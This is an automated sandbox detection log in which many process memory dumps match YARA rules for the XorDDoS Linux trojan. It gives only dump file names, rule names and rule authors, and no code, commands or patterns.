Source: 6298.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6298.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6525.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6525.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6525.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6457.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6391.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6391.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6391.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6369.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6369.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6369.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6333.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6333.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6333.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6331.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6331.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6331.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6496.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6422.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6422.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6422.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6498.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6510.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6510.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6510.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6338.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6338.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6338.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6367.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6367.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6367.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6364.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6364.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6364.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6440.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6440.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6440.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6301.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6301.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6301.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6410.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6410.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6410.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6322.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6322.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6322.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6417.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6417.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6417.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6576.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6388.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6388.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6388.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6491.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6491.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6491.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6263.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6263.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6263.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6579.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6579.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6579.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6508.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6508.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6508.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6530.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6533.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6403.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6403.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6403.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6420.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6420.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6420.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6319.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6319.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6319.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6562.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6562.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6562.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6479.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6479.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6479.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6394.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6394.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6394.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6593.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6593.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6593.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6428.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6428.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6428.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6488.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6488.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6488.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6536.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6536.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6536.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6493.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6460.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6460.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6460.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6311.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6311.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6311.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6335.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6316.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6316.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6316.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6435.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6567.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6567.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6567.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6584.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6584.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6584.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6386.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6386.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6386.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6545.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6545.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6545.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6559.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6559.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6559.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6564.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6564.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6564.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6264.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6264.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6264.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6446.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6446.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6446.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6549.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6549.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6549.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6581.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6581.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6581.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6425.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6425.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6425.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6528.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6528.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6528.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6314.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6314.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6314.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6570.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6471.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6471.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6471.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6505.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6505.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6505.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6443.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6443.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6443.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6405.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6405.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6405.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6598.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6598.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6598.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6587.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6587.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6587.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6438.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6438.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6438.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6547.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6547.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6547.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6463.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6463.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6463.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6328.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6328.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6328.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6542.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6542.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6542.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6452.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6452.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6452.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6596.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
